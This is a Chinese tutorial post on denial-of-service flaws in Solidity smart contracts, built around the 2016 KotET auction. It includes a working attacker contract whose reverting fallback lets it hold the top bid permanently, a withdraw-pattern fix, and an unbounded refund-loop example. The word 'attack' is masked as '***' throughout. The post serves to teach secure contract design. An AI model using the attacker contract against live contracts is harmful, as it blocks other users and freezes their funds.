2. 程式人生 > >solidity智慧合約[51]-安全—dos***

solidity智慧合約[51]-安全—dos***

阿新 發佈:2018-11-30

Dos***

dos***也叫做拒絕服務***,通過使程式操作無效完成***的目的。

下面的一段合約是2016年KotET(“紛爭時代”)合約,其遭受了dos***。本小節將揭開此合約被***的祕密。

原始碼

在下面KotET合約程式碼中,模擬了爭奪皇位的功能。只有出價最高的人才能夠奪得桂冠。 合約中的bid方法正是最核心的競價合約。只有當msg.value即附帶的以太幣大於當前最大的出價人,就會首先將從前的最高價格轉移給從前的出價人。完成之後,新的價格和資金會替換掉舊的資金。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 
pragma solidity ^0.4
 
.23;
contract Auction{
    address public currentLeader; //當前最高出價人
    uint256 public highestBid;  //當前最高價格
    mapping(address=>uint) balance;  //資金錶

    //競價合約
    function bid() public payable{
        require(msg.value >highestBid);
 

        require(currentLeader.send(highestBid));

        currentLeader = msg.sender;
        highestBid= msg.value;
    }
}

***合約

下面是******的合約。***手法為:首先部署POC合約。假設為0x3456 將Auction合約的地址傳遞給setInstance,構建auInstance介面例項。從而能夠在外部呼叫合約。執行attack方法,附帶以太坊,例如100wei。假設還沒有進行過拍賣,那麼當前的最高出價地址為當前合約,最高價格為100wei。假設有另外一個人想爭奪皇位,其出價了200wei 呼叫了Auction合約的bid方法。雖然其價格最高,但是這筆操作不能成功。原因就在於currentLeader.send(highestBid)轉賬,如果是合約地址,會呼叫合約中自定義的回撥函式,而在當前案例中的回撥函式,revert()意味著操作回滾,不成功。因此始終沒有辦法將錢還給合約,此合約將霸佔王位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
pragma solidity ^0.4.23;
interface Auction{

    function bid() external payable;
}
contract POC{

    address owner;
    Auction auInstance;
    constructor() public{
        owner = msg.sender;
    }

    modifier onlyOwner(){
        require(owner==msg.sender);
        _;
    }

    function setInstance(address addr) public onlyOwner{
        auInstance = Auction(addr);
    }
    function attack() public payable onlyOwner{
        auInstance.bid.value(msg.value)();
    }


    function() external payable{
        revert();
    }
}

解決辦法

讓使用者自己去取錢,而不是自動的轉移資金到失敗者的賬戶中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 
pragma solidity ^0.4.23;
contract Auction{
    address public currentLeader;
    uint256 public highestBid;
    //儲存金額
    mapping(address=>uint) public balance;
    function bid() public payable{
        require(msg.value >highestBid);
        balance[currentLeader] = highestBid;
        currentLeader = msg.sender;
        highestBid= msg.value;
    }
    //使用者提錢
    function withdraw() public{

        require(balance[msg.sender]!=0);

        msg.sender.transfer(balance[msg.sender]);
        balance[msg.sender] = 0;
    }
}

dos***案例2

dos***的第二個例子是,謹慎的使用迴圈。

如下,refundAll方法為動態陣列refundAddresses中每一個賬戶轉移資金。由於refundAddresses長度不確定。一旦超過了以太坊gaslimit的限制,就會導致這筆操作不能夠成功。

對可以被外部使用者人為操縱的資料結構進行批量操作,建議使用取回模式而不是傳送模式,每個投資者可以使用withdrawFunds取回自己應得的代幣。
如果實在必須通過遍歷一個變長陣列來進行轉賬,最好估計完成它們大概需要多少個區塊以及多少筆交易。

下面合約的第二個錯誤在於,一旦某一個賬戶轉賬不成功,就會導致所以交易回滾,全部失敗。

1
2
3
4
5
6
7
8
9
 
address[] private refundAddresses;
mapping (address => uint) public refunds;


function refundAll() public {
    for(uint x; x < refundAddresses.length; x++) {
        require(refundAddresses[x].send(refunds[refundAddresses[x]]))
    }
}

參考資料

https://consensys.github.io

image.png

相關推薦

solidity智慧合約[51]-安全dos***

Dos*** dos***也叫做拒絕服務***,通過使程式操作無效完成***的目的。 下面的一段合約是2016年KotET(“紛爭時代”)合約,其遭受了dos***。本小節將揭開此合約被***的祕密。 原始碼 在下面KotET合約程式碼中,模擬了爭奪皇位的功能。只有出價最高的人才能夠奪得桂冠。 合

solidity智慧合約[49]-安全-溢位***

***回顧 1234567 2016年6月,以太坊最大眾籌專案The DAO被***,***獲得超過350萬個以太幣,最終導致以太坊分叉為ETH和ETC。2016年拒絕服務***:GovernMental's 1100 ETH2016年KotET(“紛爭時代”)合約遭受*

solidity智慧合約[54]-安全—取反

相反數 有符號的solidity整數型別如果有N位。那麼其值的範圍是-2^(N-1) to 2^(N-1)-1。 這意味著該型別負數的最大值取相反數之後不能夠被接收。 相反數陷阱 如下的Negation合約說明了負數在面臨取相反數操作時可能遇到的問題。由於對於負數取相反數。實則是取負數的補碼操作。因

solidity智慧合約[53]-安全-重入***

重入*** 當呼叫外部的合約時,外部合約會接管控制流程,從而可能給自己的資料帶來意想不到的修改。2016年6月,以太坊最大眾籌專案The DAO被***,***獲得超過350萬個以太幣。正是由於此陷阱。 重入***本質 1、呼叫外部合約2、fallback回撥函式被多次執行3、邏輯順序出現問題4、c

solidity智慧合約[52]-安全-storage陷阱

storage陷阱 下面的合約是一個鎖定金額的合約,使用者將資金儲存在此合約中,只有當過了一段時間時候才能夠提取出來。下面的案例是為了說明storage屬性預設性帶來的陷阱。payIn函式是當用戶儲存金額時呼叫的函式。傳遞的引數似乎解鎖的時間。在合約payIn中,HoldRecord newRecord

solidity智慧合約[10]-動態位元組陣列

動態位元組陣列的定義 bytes 變數名 = new bytes(大小); 動態位元組陣列的屬性 可以修改大小和長度 動態位元組陣列預設初始化為0 bytes public name = new bytes(2);name的值一開始為0x0000 動態位元組陣列的賦值

solidity智慧合約[9]-位元組陣列與運算

byte型別 有byte bytes1 bytes2 … bytes32特殊的有byte == bytes1 後面的數字代表佔了多少位元組。1個位元組在記憶體中佔了8位 性質 固定位元組陣列不能修改長度和內容 位元組一般用16進位制來儲存 16進制中的1個數字代表佔了4位。

solidity智慧合約[8]-位運算與字面量

位運算 solidity中,可以對於最底層的位進行操作。由於以太坊中需要消耗gas,因此,為了節約gas、所以對於位的操作會用到比較頻繁。solidity中支援多種型別的位運算操作1、位與 &2、位或 |3、位異或 ^4、位取反 ~5、<<6、>> 數字3、4的二進位制

solidity智慧合約[7]-整型與運算

整型變數 整數是現實中處理最多的單位,在solidity中的整數型別有int和uint,int型別可以儲存負數,uint型別只能夠儲存非負數。int型別:int8,int16,int24,int32…int256uint型別:uint8,uint16,uint24,uint32…uint256 後面的

solidity智慧合約[6]-基本型別與bool運算

變數 儲存資料的抽象單位,代表記憶體中的一段空間。 型別 同其他的程式語言一樣,solidity中也有許多基本的型別。型別決定了儲存空間的大小和解析的方式。下面列舉出了solidity中基本的型別int、uint、byte、string、bool 基本型別 bool型別 這一小節

solidity智慧合約[5]——一筆交易詳解

在之前,我們已經寫好了一個最簡單的helloworld合約,如下: 1234567891011121314151617 pragma solidity ^0.4.23;contract HelloWorld{    string public name

solidity智慧合約[4]-pure與view剖析

pure與view程式碼例子 如下的一段solidity智慧合約中,只要有了pure與view修飾符的函式,那麼呼叫函式就不會消耗gas。而沒有pure與view修飾的函式,如下面的change就會消耗gas。 12345678910111213141516171819

solidity智慧合約[19]-for迴圈

for for 語句為"當型"迴圈結構。for語句的語法為: 123 for ( 表示式 1; 表示式 2; 表示式){  語句} 說明:表示式 1為迴圈變數賦初始值。表示式 2為迴圈條件。表示式 3為迴圈變數增值。 for迴圈列印斐波拉

solidity智慧合約[18]-twoarray

二維陣列定義 1 uint[2][3] grade = [[60,80],[40,20],[50,50]]; 返回二維陣列 1234 function getGrade() view public returns(ui

solidity智慧合約[17]-動態長度陣列

動態長度陣列 動態長度陣列可以改變大小和長度 動態長度陣列的定義 uint[] grade=[1,2,3,4,5]; 返回動態長度陣列 123 function getArray() public view returns(uint[]){   &nbs

solidity智慧合約[16]-固定長度陣列

陣列 記憶體中的一片連續區域 定義 12 int[7] math;bytes2[3] bytesTest; 賦值 1 uint[5] public  grade =[1,2,3,4,5];

solidity智慧合約[15]-fixtostring

固定位元組陣列轉string 固定位元組陣列轉換為string沒有好的辦法,必須要首先將固定位元組陣列轉換為動態位元組陣列,再將動態位元組陣列轉換為string 123456789101112 //bytes2  ->  bytes  

solidity智慧合約[14]-動態位元組陣列轉換為string

動態位元組陣列轉換為string 動態位元組陣列可以通過string(name)非常直接的轉換為string型別,下面為例子: 1234567891011121314 pragma solidity ^0.4.23;contract dynamicTostring{ &

Solidity 語言學習(2)—— Solidity智慧合約檔案結構

版本申明 pragma solidity ^0.4.0; 說明: 1 版本要高於0.4才可以編譯 2 表示高於0.5的版本則不可編譯,第三位的版本號但可以變,留出來用做bug可以修復(如 0.4.1的編譯器有bug,可在0.4.2 修復,現有合約不用該程式碼)。 引用其他

solidity智慧合約[29]-函式作用域

函式重名與函式作用域問題 1、當狀態變數中已經有了一個變數a、狀態變數中就不能夠再有一個同名的狀態變數。2、當狀態變數中和函式體內部已經有了都有一個同名的函式的時候,預設處理的是函式體內部的變數。也就是說,變數的操作和其他語言一樣,仍然滿足就近原則。 12345678910